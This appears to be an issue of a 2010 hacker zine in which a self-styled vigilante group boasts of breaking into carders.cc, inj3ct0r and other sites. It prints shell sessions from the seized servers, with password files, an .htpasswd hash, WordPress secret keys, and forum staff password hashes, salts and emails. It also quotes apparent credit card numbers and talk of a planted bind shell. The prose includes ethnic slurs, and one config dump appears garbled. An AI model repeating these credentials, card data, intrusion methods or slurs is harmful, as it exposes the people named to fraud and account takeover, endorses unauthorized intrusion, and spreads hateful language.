+ +For those who are reading and laughing with us: +We (your happy ninjas) wish you a + + , + _/^\_ + < hax > + /.-.\ + * MERRY * `/&\` + ,@.*;@, + /_o.I %_\ + (`'--:o(_@; + /`;--.,__ `') + ;@`o % O,*`'`&\ + (`'--)_@ ;o %'()\ + * NINJA * /`;--._`''--._O'@; + /&*,()~o`;-.,_ `""`) + /`,@ ;+& () o*`;-';\ + (`""--.,_0 +% @' &()\ + /-.,_ ``''--....-'`) + /@%;o`:;'--,.__ __.'\ + ;*,&(); @ % &^;~`"`o;@(); + * HAXMAS * /(); o^~; & ().o@*&`;&%O\ + `"="==""==,,,.,="=="==="` + __.----.(\-''#####---...___...-----._ + '` \)_`"""""` + .--' `) + o( )_-\ + `"""` ` + +After our first release we got wind of some strange rumours. So just +to be sure, we need to clarify some facts. + +So, who are we? First, lets talk about some things we are not. We are +not an underground rival kiddy group. We are not a cyber mafia gang. +We are the watchmen, the hackers who quietly observe the scene. If any +skiddy community gets too big, we shut them down. If any lamer causes +too much trouble, we shut them down. If any group keeps fucking stuff +up, we stop them. + +So, why are we doing this? Some people say that being a vigilanty is +wrong and that we are actually criminals. What can we say? This may be +true. But the way we see it, if your not part of the solution, your +part of the fucking problem. These idiots spread garbage across our +scene and that is why they got owned. We take pride in what is left of +the scene and we have serious problems with those who rape it. + +That's why we do what MUST be done. + +There are some things left we would like to say about carders.cc. +First of all, they came back online after they got rm'ed. In the first +issue we gave our word that we would make sure carders.cc would never +come back. Well, we delivered on that promise in this issue. And as +such carders.cc has once again been eliminated. Maybe this time they +will get the hint. + +Also, Heise Security said that we were a rival group trying to +capitalize on the demise of carders.cc. 
Apparently they weren't happy +about our disclosure of the carders.cc database that included the +personal information of carders.cc victims. What Heise forgot was that +with this action, all the victims of carders.cc got the chance to +realize that they were victims of fraud. You can try to say that our +disclosure of the database put them at even greater risk of fraud but +we disagree. What is more risky? Having your information secretly on +an "underground" carding forum where it WILL be sold and used in +frauduelent activity? Or, having it released so that you can be +notified and take the appropriate action to mitigate the damage that +has been done? I know which option I'd rather have. + +It is quite impressive how many people wrote about the Carders Hack +without even bothering to read the zine. It is hilarious to see how +the media works. Somebody writes an article, others copy information +from it, others copy from it again. If we take a shit in a bowl. Then +you eat that shit and puke it back into a different bowl for someone +else to eat then they do the same thing, what do you have? "Two +Journo's One Cup" is what you have. Fucking pathetic. + +On the other hand, we'd like to thank Brian Krebs. Even if some of his +conclusions were way off the mark, he was still the first one to +report about carders.cc and nearly every other article was based on +Brian's work. At least you didn't eat shit and regurgitate it like the +rest Brian, keep up the good work. + +Enough jibber jabber, let's get to business. You will soon realize +that our targets vary: + +We owned ettercap because we were tired of people firing that shit up +and pretending to be a l33th4x0r sheep who think they are the greatest +hackerz with their ARP spoofing toolkitz.. If you have installed +ettercap in the last 5 years you may want to check yo shit (;p). 
+ +We owned offsec including backtrack and exploit-db because they are +fucking security "expert" maggots (oops s/m/f/) who just fail so hard +at security that we wonder why people really take their training +courses. We imagine it's like open mic night at the laughatorium. + +We owned inj3ct0r because they are lameass wannabe milw0rm kids whose +sole purpose in life is to disclose XSS 0dayz in Joomla (RSnake +anyone?). + +We owned carders.cc (AGAIN) because they are unable to learn from +their mistakes and keep spreading garbage around the underground. + +We owned free-hack because they are developing into one of the +largest, most arrogant script-kiddie breeding grounds on the +intertubez. + +,_._._._._._._._|____________________________________________________ +|_|_|_|_|_|_|_|_|___________________________________________________/ + ~ carders.cc ~ ! + +Here we go again. We hope that everybody was looking forward to see +carders.cc getting owned again. We kept our word, didn't we? Let us +begin: + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| The ninja guys piss on you and your half trained monkeys or | +| whatever your leet underground team consists of. If you continue, | +| you will be owned over again and rm'd twice. Also we will punch | +| you in the face. | +|____________________________________________________________________| + +Our lazy ninja squad was too drunk to come over and punch you in the +fucking face. So we'll just stick to owning you for now. Carders.cc +went down for a few days, but came back as if nothing had happened. +They switched some server admins and installed some new software in +the hopes that they would be safe. 
They turned on some l33t "security" +settings like PHP's "Safe Mode" and "Openbase Dir", and they also +disabled lots of functions. All in all they thought they were pretty +locked down. Well, obviously they were fucking wrong. It's hard to +harden a system when everything is backdoored and unfortunately we are +just too ninja to get stopped by your silly protections. You can never +stop us. We will always keep owning and exp0sing you. + +No. Matter. What. You. Try. + +$ uname -a +FreeBSD sec1560.2x4.ru 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21 15:02:08 UTC 2009 root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 + +$ id +uid=1000(carderscc) gid=1000(carderscc) groups=1000(carderscc) + +$ w + 1:24AM up 11 days, 4:23, 0 users, load averages: 0.37, 0.48, 0.54 +USER TTY FROM LOGIN@ IDLE WHAT + +$ alias ls="ls -la" + +$ ls + +total 47 +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 . +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +-r--r--r-- 1 root wheel 6206 Jan 18 2010 COPYRIGHT +-rw-r--r-- 1 root wheel 0 Jul 3 19:12 a +drwxr-xr-x 2 root wheel 1024 Jan 18 2010 bin +drwxr-xr-x 7 root wheel 512 Jan 18 2010 boot +dr-xr-xr-x 5 root wheel 512 Nov 24 21:14 dev +drwxr-xr-x 22 root wheel 2560 Nov 1 23:54 etc +drwxr-x--x 4 root wheel 512 Nov 1 23:54 home +drwxr-xr-x 3 root wheel 1536 Jan 18 2010 lib +drwxr-xr-x 2 root wheel 512 Apr 4 2010 libexec +drwxr-xr-x 2 root wheel 512 Jan 18 2010 media +drwxr-xr-x 2 root wheel 512 Jan 18 2010 mnt +dr-xr-xr-x 1 root wheel 0 Dec 6 00:58 proc +drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 root +drwxr-xr-x 2 root wheel 2560 Jan 18 2010 sbin +lrwxr-xr-x 1 root wheel 11 Jan 18 2010 sys -> usr/src/sys +drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp +drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr +drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var + +$ cat /etc/passwd +# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $ 
+# +root:*:0:0:Charlie &:/root:/bin/csh +toor:*:0:0:Bourne-again Superuser:/root: +daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin +operator:*:2:5:System &:/:/usr/sbin/nologin +bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin +tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin +kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin +games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin +news:*:8:8:News Subsystem:/:/usr/sbin/nologin +man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin +sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin +smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin +mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin +bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin +proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin +_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin +_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin +uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico +pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin +www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin +nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin +mysql:*:88:88:MySQL Daemon:/nonexistent:/sbin/nologin +postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin +carderscc:*:1000:1000:User &:/home/carderscc:/sbin/nologin +cardersblog:*:1001:1001:User &:/home/cardersblog:/usr/sbin/nologin + +$ cd /root + +$ ls +total 412628 +drwxr-xr-x 11 root wheel 1024 Nov 8 20:33 . +drwxr-xr-x 17 root wheel 512 Jul 3 19:12 .. 
+-rw------- 1 root wheel 1856 Dec 5 23:53 .bash_history +-rw-r--r-- 1 root wheel 798 Jan 18 2010 .cshrc +-rw------- 1 root wheel 2909 Dec 7 22:31 .history +-rw-r--r-- 1 root wheel 155 Jan 18 2010 .k5login +-rw------- 1 root wheel 61 Jul 5 21:44 .lesshst +-rw-r--r-- 1 root wheel 303 Jan 18 2010 .login +drwx------ 3 root wheel 512 Dec 6 02:34 .mc +-rw------- 1 root wheel 641 Nov 8 20:33 .mysql_history +-rw-r--r-- 1 root wheel 265 Jan 18 2010 .profile +drwx------ 2 root wheel 512 Nov 7 17:20 .ssh +-rw-r--r-- 1 root wheel 417314245 Oct 24 21:13 24_10_2010_carderscc_01.sql +drwxr-xr-x 3 root wheel 512 Jul 3 00:34 backup +drwxr-xr-x 4 root wheel 512 Nov 8 17:58 backups +drwxr-xr-x 2 root wheel 512 Jul 20 2009 crack +-rw-r--r-- 1 root wheel 3223 Jul 20 2009 crack.zip +-rw-r--r-- 1 root wheel 85 Aug 9 03:31 ddos.php +-rw-r--r-- 1 root wheel 168 Feb 1 2010 example.php +drwxr-xr-x 3 root wheel 512 Jul 5 00:41 greensql +-rw-r--r-- 1 root wheel 20 Aug 9 03:26 info.php +-rw------- 1 root wheel 16877 Jul 29 20:44 mbox +drwxr-xr-x 3 root wheel 512 Jul 3 18:59 php +drwxr-xr-x 14 carderscc carderscc 1536 Nov 2 16:15 proftpd-1.3.3c +-rw-r--r-- 1 root wheel 4885847 Oct 29 17:27 proftpd-1.3.3c.tar.gz +drwxr-xr-x 2 root wheel 512 Nov 8 18:50 stylebackup + +Mad PHP-Codez again! + +$ cat ddos.php + + +$ cat info.php + + +$ cat example.php + + +$ cd /home/carderscc + +$ ls +total 18 +drwxr-x--- 7 carderscc www 512 Nov 18 20:45 . +drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. +dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 carders.cc +drwxrwxr-x 2 carderscc www 512 Dec 2 00:34 jabber.carders.cc +drwxrwxr-x 11 carderscc www 3072 Nov 8 17:27 pma +drwxrwxrwx 2 carderscc www 2048 Dec 6 00:40 temp +drwxrwxr-x 5 carderscc www 512 Nov 6 19:47 vbseo + +$ cd carders.cc + +$ ls +total 2286 +dr-xr-x--- 18 carderscc www 2560 Nov 12 23:32 . +drwxr-x--- 7 carderscc www 512 Nov 18 20:45 .. 
+-r-xr-x--- 1 carderscc www 1107 Dec 5 15:34 .htaccess +-r-xr-x--- 1 carderscc www 20 Nov 12 18:16 .htpasswd +dr-xr-x--- 4 carderscc www 2048 Nov 18 21:17 admincp +-r-xr-x--- 1 carderscc www 40115 Oct 29 20:53 ajax.php +-r-xr-x--- 1 carderscc www 75525 Oct 29 20:53 album.php +-r-xr-x--- 1 carderscc www 19041 Oct 29 20:52 announcement.php +dr-xr-x--- 2 carderscc www 512 Oct 29 22:39 archive +-r-xr-x--- 1 carderscc www 8668 Oct 29 20:52 asset.php +-r-xr-x--- 1 carderscc www 20406 Oct 29 20:52 assetmanage.php +-r-xr-x--- 1 carderscc www 15710 Oct 29 20:52 attachment.php +-r-xr-x--- 1 carderscc www 6658 Oct 29 20:52 attachment_inlinemod.php +-r-xr-x--- 1 carderscc www 3449 Oct 29 20:52 blog_attachment.php +-r-xr-x--- 1 carderscc www 96043 Oct 29 20:53 calendar.php +-r-xr-x--- 1 carderscc www 43 Oct 29 20:52 clear.gif +dr-xr-x--- 9 carderscc www 3584 Nov 2 00:32 clientscript +-r-xr-x--- 1 carderscc www 15270 Oct 29 20:52 converse.php +dr-xr-x--- 7 carderscc www 512 Nov 2 00:33 cpstyles +-r-xr-x--- 1 carderscc www 3231 Oct 29 20:52 cron.php +-r-xr-x--- 1 carderscc www 5139 Oct 29 20:52 css.php +dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customavatars +dr-xr-x--- 3 carderscc www 512 Nov 2 00:33 customgroupicons +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 customprofilepics +-r-xr-x--- 1 carderscc www 1707 Oct 29 20:52 editor.php +-r-xr-x--- 1 carderscc www 46932 Oct 29 20:53 editpost.php +-r-xr-x--- 1 carderscc www 1326 Oct 29 20:52 entry.php +-r-xr-x--- 1 carderscc www 30006 Oct 29 20:53 external.php +-r-xr-x--- 1 carderscc www 9888 Oct 29 20:52 faq.php +-r-xr-x--- 1 carderscc www 5430 Jul 29 15:42 favicon.ico +-r-xr-x--- 1 carderscc www 22568 Oct 29 20:53 forum.php +-r-xr-x--- 1 carderscc www 42374 Oct 29 20:53 forumdisplay.php +-r-xr-x--- 1 carderscc www 1988 Oct 29 20:52 global.php +-r-xr-x--- 1 carderscc www 155760 Oct 29 20:54 group.php +-r-xr-x--- 1 carderscc www 26072 Oct 29 20:53 group_inlinemod.php +-r-xr-x--- 1 carderscc www 11470 Oct 29 20:53 
groupsubscription.php +-r-xr-x--- 1 carderscc www 8961 Oct 29 20:53 image.php +dr-xr-x--- 28 carderscc www 1536 Nov 22 16:54 images +dr-xr-x--- 9 carderscc www 6144 Nov 6 19:47 includes +-r-xr-x--- 1 carderscc www 2318 Oct 29 20:53 index.php +-r-xr-x--- 1 carderscc www 46943 Oct 29 20:53 infraction.php +-r-xr-x--- 1 carderscc www 187725 Oct 29 20:54 inlinemod.php +-r-xr-x--- 1 carderscc www 23934 Jul 29 21:10 invites.php +-r-xr-x--- 1 carderscc www 6778 Aug 14 08:15 itrader.php +-r-xr-x--- 1 carderscc www 14964 Aug 14 08:15 itrader_detail.php +-r-xr-x--- 1 carderscc www 13515 Aug 14 08:15 itrader_feedback.php +-r-xr-x--- 1 carderscc www 1405 Aug 14 08:15 itrader_global.php +-r-xr-x--- 1 carderscc www 22171 Aug 14 08:15 itrader_main.php +-r-xr-x--- 1 carderscc www 3970 Aug 14 08:15 itrader_report.php +-r-xr-x--- 1 carderscc www 11362 Oct 29 20:53 joinrequests.php +-r-xr-x--- 1 carderscc www 1643 Oct 29 20:53 list.php +-r-xr-x--- 1 carderscc www 10869 Oct 29 20:53 login.php +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 madp +-r-xr-x--- 1 carderscc www 30166 Oct 29 20:53 member.php +-r-xr-x--- 1 carderscc www 16314 Oct 29 20:53 member_inlinemod.php +-r-xr-x--- 1 carderscc www 40267 Oct 29 20:53 memberlist.php +-r-xr-x--- 1 carderscc www 22186 Oct 29 20:53 misc.php +dr-xr-x--- 2 carderscc www 512 Nov 6 19:48 modcp +-r-xr-x--- 1 carderscc www 76749 Oct 29 20:53 moderation.php +-r-xr-x--- 1 carderscc www 6701 Oct 29 20:53 moderator.php +-r-xr-x--- 1 carderscc www 17474 Oct 29 20:53 newattachment.php +-r-xr-x--- 1 carderscc www 41001 Oct 29 20:53 newreply.php +-r-xr-x--- 1 carderscc www 20107 Oct 29 20:53 newthread.php +-r-xr-x--- 1 carderscc www 21724 Oct 29 20:53 online.php +dr-xr-x--- 5 carderscc www 512 Nov 2 00:33 packages +-r-xr-x--- 1 carderscc www 8018 Oct 29 20:53 payment_gateway.php +-r-xr-x--- 1 carderscc www 13282 Oct 29 20:53 payments.php +-r-xr-x--- 1 carderscc www 3984 Oct 29 20:53 picture.php +-r-xr-x--- 1 carderscc www 16587 Oct 29 20:53 
picture_inlinemod.php +-r-xr-x--- 1 carderscc www 26091 Oct 29 20:53 picturecomment.php +-r-xr-x--- 1 carderscc www 29260 Oct 29 20:53 poll.php +-r-xr-x--- 1 carderscc www 10336 Oct 29 20:53 posthistory.php +-r-xr-x--- 1 carderscc www 76507 Oct 29 20:54 postings.php +-r-xr-x--- 1 carderscc www 7009 Oct 29 20:53 printthread.php +-r-xr-x--- 1 carderscc www 79357 Oct 29 20:54 private.php +-r-xr-x--- 1 carderscc www 163617 Oct 29 20:55 profile.php +-r-xr-x--- 1 carderscc www 56285 Oct 29 20:54 register.php +-r-xr-x--- 1 carderscc www 7216 Oct 29 20:53 report.php +-r-xr-x--- 1 carderscc www 14687 Oct 29 20:53 reputation.php +-r-xr-x--- 1 carderscc www 34539 Oct 29 20:54 search.php +-r-xr-x--- 1 carderscc www 22632 Oct 29 20:54 sendmessage.php +-r-xr-x--- 1 carderscc www 12407 Oct 29 20:54 showgroups.php +-r-xr-x--- 1 carderscc www 12660 Oct 29 20:54 showpost.php +-r-xr-x--- 1 carderscc www 80037 Oct 29 20:54 showthread.php +dr-xr-x--- 2 carderscc www 512 Nov 2 00:33 signaturepics +dr-xr-x--- 2 carderscc www 512 Nov 2 00:32 store_sitemap +-r-xr-x--- 1 carderscc www 38784 Oct 29 20:54 subscription.php +-r-xr-x--- 1 carderscc www 5321 Oct 29 20:54 tags.php +-r-xr-x--- 1 carderscc www 8722 Oct 29 20:54 threadrate.php +-r-xr-x--- 1 carderscc www 11068 Oct 29 20:54 threadtag.php +-r-xr-x--- 1 carderscc www 61 Oct 29 20:52 uploadprogress.gif +-r-xr-x--- 1 carderscc www 39639 Oct 29 20:54 usercp.php +-r-xr-x--- 1 carderscc www 20956 Oct 29 20:54 usernote.php +-r-xr-x--- 1 carderscc www 16518 Jul 29 16:35 vaispy.php +dr-xr-x--- 13 carderscc www 1024 Nov 2 00:32 vb +dr-xr-x--- 4 carderscc www 512 Nov 6 19:48 vbseo +-r-xr-x--- 1 carderscc www 45239 Nov 6 19:48 vbseo.php +-r-xr-x--- 1 carderscc www 4112 Nov 6 19:47 vbseocp.php +-r-xr-x--- 1 carderscc www 27801 Oct 29 20:54 visitormessage.php +-r-xr-x--- 1 carderscc www 1647 Oct 29 20:54 widget.php +-r-xr-x--- 1 carderscc www 3769 Oct 29 20:54 xmlsitemap.php + +$ cat .htpasswd +ddos:XScRLnTwdeJ6k + +$ cat includes/config.php + 
usr/src/sys +drwxrwxrwt 11 root wheel 512 Dec 5 23:42 tmp +drwxr-xr-x 15 root wheel 512 Jan 18 2010 usr +drwxr-xr-x 23 root wheel 512 Nov 24 21:14 var + +?> + +$ cd /home/cardersblog + +$ ls +total 8 +drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 . +drwxr-x--x 4 root wheel 512 Nov 1 23:54 .. +dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 blog.carders.cc +drwxrwxrwx 2 cardersblog www 512 Nov 2 01:16 temp + +$ cd blog.carders.cc + +$ ls +total 2928 +dr-xr-x--- 5 cardersblog www 1024 Nov 21 00:18 . +drwxr-xr-x 4 cardersblog www 512 Nov 2 01:16 .. +-rw-r--r-- 1 cardersblog www 188 Nov 21 00:18 .htaccess +-r-xr-x--- 1 cardersblog www 397 Aug 27 17:22 index.php +-r-xr-x--- 1 cardersblog www 2683109 Jul 18 16:06 latest.tar.gz +-r-xr-x--- 1 cardersblog www 15410 Aug 27 17:22 license.txt +-r-xr-x--- 1 cardersblog www 9122 Aug 27 17:22 readme.html +-r-xr-x--- 1 cardersblog www 4391 Aug 27 17:22 wp-activate.php +dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-admin +-r-xr-x--- 1 cardersblog www 40284 Aug 27 17:23 wp-app.php +-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-atom.php +-r-xr-x--- 1 cardersblog www 274 Aug 27 17:23 wp-blog-header.php +-r-xr-x--- 1 cardersblog www 3926 Aug 27 17:23 wp-comments-post.php +-r-xr-x--- 1 cardersblog www 238 Aug 27 17:23 wp-commentsrss2.php +-r-xr-x--- 1 cardersblog www 3173 Aug 27 17:23 wp-config-sample.php +-r-xr-x--- 1 cardersblog www 3506 Jul 31 14:20 wp-config.php +dr-xr-x--- 6 cardersblog www 512 Aug 27 18:05 wp-content +-r-xr-x--- 1 cardersblog www 1255 Aug 27 17:23 wp-cron.php +-r-xr-x--- 1 cardersblog www 240 Aug 27 17:23 wp-feed.php +dr-xr-x--- 7 cardersblog www 2560 Jul 18 16:06 wp-includes +-r-xr-x--- 1 cardersblog www 2002 Aug 27 17:23 wp-links-opml.php +-r-xr-x--- 1 cardersblog www 2441 Aug 27 17:23 wp-load.php +-r-xr-x--- 1 cardersblog www 26059 Aug 27 17:23 wp-login.php +-r-xr-x--- 1 cardersblog www 7774 Aug 27 17:23 wp-mail.php +-r-xr-x--- 1 cardersblog www 487 Aug 27 17:23 wp-pass.php +-r-xr-x--- 1 cardersblog www 
218 Aug 27 17:23 wp-rdf.php +-r-xr-x--- 1 cardersblog www 316 Aug 27 17:23 wp-register.php +-r-xr-x--- 1 cardersblog www 218 Aug 27 17:23 wp-rss.php +-r-xr-x--- 1 cardersblog www 220 Aug 27 17:23 wp-rss2.php +-r-xr-x--- 1 cardersblog www 9177 Aug 27 17:23 wp-settings.php +-r-xr-x--- 1 cardersblog www 18695 Aug 27 17:23 wp-signup.php +-r-xr-x--- 1 cardersblog www 3702 Aug 27 17:23 wp-trackback.php +-r-xr-x--- 1 cardersblog www 94184 Aug 27 17:23 xmlrpc.php + +$ cat wp-config.php +/?7m8/r0!,o}+e:eQfZo;7W:h7av[E:0V['); +define('NONCE_KEY', '|R(!,}:(`utsK5kQ0$LoSd=e?X+C]bqBEp5WWbWLSb'); + +/**#@-*/ + +/** + * WordPress Database Table prefix. + * + * You can have multiple installations in one database if you give each a unique + * prefix. Only numbers, letters, and underscores please! + */ +$table_prefix = 'wp_'; + +/** + * WordPress Localized Language, defaults to English. + * + * Change this to localize WordPress. A corresponding MO file for the chosen + * language must be installed to wp-content/languages. For example, install + * de.mo to wp-content/languages and set WPLANG to 'de' to enable German + * language support. + */ +define ('WPLANG', ''); + +/** + * For developers: WordPress debugging mode. + * + * Change this to true to enable the display of notices during development. + * It is strongly recommended that plugin and theme developers use WP_DEBUG + * in their development environments. + */ +define('WP_DEBUG', false); + +/* That's all, stop editing! Happy blogging. */ + +/** Absolute path to the WordPress directory. */ +if ( !defined('ABSPATH') ) + define('ABSPATH', dirname(__FILE__) . '/'); + +/** Sets up WordPress vars and included files. */ +require_once(ABSPATH . 'wp-settings.php'); + +## + + + | + __________ | + _ __ _ | | | + /_\ / \ /_\ | | | + put shit =|= | // | =|= | | | + to shit ! \__/ ! 
| | | + carders.cc _ | | | + ___ | ___ //' | | | + [___] | _ :=| |=: __T_||_T__ |p= | | + | ~| | =)_)= | | [__________] | | | + | | | (_( |xXx| \_ _/ | | | + | | | )_) """"" \ / | | | + \___| V | | | | | + | `========, | | | | | +________`. .'_________________| |________|__________lc_| + `. .' (____) \ + _| |_... .;;;;;;;;. \ + (________);;;; :;;;;;;;;;;: + :::::::' '::::::::' HAPPY NINJA BATHROOM + +Team Member Passes: + +Vitali:28cf8ccb53f80f7e8fca5e781f2e6424:dusFzU/ZvUe;e@fx\\3>XIgN[yGx9[*:admin@carders.cc +Juri:9475264713e83164de106d099350ff97:pqfgN4x7P)5_}0-E+PsIJ\\=_o1|oV&:daafagafd@dadadagfasg.dsxc +Luigi:13ae8bfbd4fc44302fc6261f58dd583e:.u5//.-K4`u$lm00M3V}h:d397080@lhsdv.com +Poseidon:0c18d81bcfa2845490f75e785f0e2457:BG$vA-%K_X<=|nF:tiberiusus@carders.in + + +You guys dont get it, do you? We told you to fuck off and still you +did not listen. We are not sorry for doing it again. You deserve it. + + ____________________________________________________|_._._._._._._._, + \___________________________________________________|_|_|_|_|_|_|_|_| + ! ~ inj3ct0r ~ + +#`````````` ___ ____ ____ +#````______/```\__//```\__/____\ +#``_/```\_/``:```````````//____\ +#`/|``````:``:``..``````/````````\ W A R N I N G !!! DISCOVERED LAMER O_o +#|`|`````::`````::``````\````````/ +#|`|`````:|`````||`````\`\______/ +#|`|`````||`````||``````|\``/``| +#`\|`````||`````||``````|```/`|`\ 1) maybe you were wrong address, go Inj3ct0r.com +#``|`````||`````||``````|``/`/_\`\ +#``|`___`||`___`||``````|`/``/````\ +#```\_-_/``\_-_/`|`____`|/__/``````\ +#````````````````_\_--_/````\`````/ 2) Or you are not wrong address, then Fuck Off! +#```````````````/____```````````/ +#``````````````/`````\`````````/ +#``````````````\______\_______/ + +Attention. This ridiculous banner is *not* part of our zine. In fact +it is inj3ct0r's 404 page. We concluded that this banner perfectly +reflects their retardedness. 
Their knowledge about security is on the +same level as their ability to speak proper english. For those who +don't know: inj3ct0r is a clone of the old milw0rm project, +administered by some morons called "r0073r", "Sid3^effects" and "L0rd +CrusAd3r". They are not only an exploit-db, but also an arrogant +community of retarded turks and arabs which tell you how you to write +your stupid Perl SQL-Injection exploit. + +All their attention whoring about how they hacked Facebook was driving +us insane and all their moaning about how they have problems with the +law was just too ridiculous for us to let them continue existing. +Actually we did not find out what kind of law problems they actually +had. We did however discover how stupid these kids are and what crap +they are talking about in their private forum area's. Check it out: + +------------- +-0day 31337 privat Area +-10-24-2010, 05:08 PM Post by KnocKout: +- +-0-Day Credit Cards | Part 2(Only 31337 Prv.)- +- +-Hi My Brothers.. +- +-14367 4454-5454-5454-5445 1 232 12-2012 +-14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE +-14376 5492-9495-5876-7382 1 280 01-2013 BONUS +-14391 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM +-14392 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM +-------------- +- +-0day 31337 privat Area +-10-17-2010, 04:36 PM Post by KnocKout: +- +-Default => Rapid,Hotfile,CC Requests.. +- +-hi my brothers, +-RapidShare, Hotfile Premium and Credit Card. Requests.. +- +-Please indicate your requests here, and I will send Pm.. +-------------- + +Not only they are sharing CC's, they also think of themselves as the +best hackerz on the planet. 
Here is how they talk about exploit-db and +offsec: + +------------- +-0day 31337 privat Area: +-07-19-2010, 10:05 PM Post by SeeMe: +- +-guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open +- +-Port State Service Reason Product Version Extra info +-22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0 +-80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora) +-301 tcp filtered unknown no-response +-443 tcp open https syn-ack +-1072 tcp filtered unknown no-response +-1087 tcp filtered unknown no-response +-1100 tcp filtered unknown no-response +-1111 tcp filtered unknown no-response +-1117 tcp filtered unknown no-response +-1443 tcp filtered ies-lm no-response +-1718 tcp filtered unknown no-response +-1720 tcp filtered H.323/Q.931 no-response +-1900 tcp filtered upnp no-response +-2000 tcp filtered cisco-sccp no-response +-2041 tcp filtered interbase no-response +-2046 tcp filtered sdfunc no-response +-2382 tcp filtered ms-olap3 no-response +-3017 tcp filtered unknown no-response +-4129 tcp filtered unknown no-response +-4900 tcp filtered unknown no-response +-5060 tcp filtered sip admin-prohibited +-5555 tcp filtered freeciv no-response +-5560 tcp filtered isqlplus no-response +-6669 tcp filtered irc no-response +-8007 tcp filtered ajp12 no-response +-9102 tcp filtered jetdirect no-response +-10000 tcp open snet-sensor-mgmt syn-ack +-44443 tcp filtered coldfusion-auth no-response +- +-but I just can't connect back to it +- +-any idea! 
+------------- +- +-07-21-2010, 10:10 PM Post by SeeMe: +- +-This is a new technology for me how to gain credentials over HTTP TRACE and TRACK +-when it's enable on a webserver +- +-The TRACE/TRACK method was enabled on the server listed below: +- +-http://www.offensive-security.com:80/ +- +-[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP] +- +- +-could gain view info from the link above +------------- +- +-07-30-2010, 12:26 AM Post by SeeMe: +- +-http://mobile.backtrack-linux.org/ +- +-exploited for good and not sure that will be able to back it up +- +-and I'm still heading for the main both sites, offsec.com and exploit-db +- +-After one month into the desert I'll be back infront of my computer on 15th of Agu +- +-and I'll prepare for a globel war +------------- + + +They are calling exploit-db "lamers-db" yet they don't see who the +real lamers are. Hardly surprising that the inj3ct0r team did not +manage their box themselves and instead gave their work to some fat +guy called "asker". But since he left his box rot with some half +updated shit, it was a child's play to tap in and root. + +$ uname -a +Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux + +$ id +uid=0(root) gid=0(root) groups=0(root) + +$ cd / + +$ ls -la +total 540 +drwxr-xr-x 22 root root 1024 Oct 3 22:04 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. 
